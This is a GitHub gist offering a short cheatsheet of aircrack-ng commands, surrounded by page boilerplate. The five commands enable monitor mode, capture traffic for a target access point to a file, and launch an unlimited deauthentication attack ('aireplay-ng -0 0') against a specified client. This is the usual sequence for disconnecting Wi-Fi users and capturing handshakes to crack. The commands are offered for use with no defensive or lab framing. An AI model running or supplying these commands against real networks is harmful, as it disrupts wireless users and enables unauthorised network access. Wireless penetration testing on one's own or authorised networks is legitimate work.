Created
May 19, 2017 15:33
-
-
Save b13bs/6c9b1a5815c5ce3b114619493be66078 to your computer and use it in GitHub Desktop.
cheatsheet for aircrack useful commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
airmon-ng start phy0 | |
iwconfig wlan1mon channel $CHANNEL | |
iwconfig wlan1mon mode monitor | |
airodump-ng -c $CHANNEL --bssid $BSSID -w output wlan1mon | |
aireplay-ng -0 0 -a $BSSID -c $CLIENT wlan1mon |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment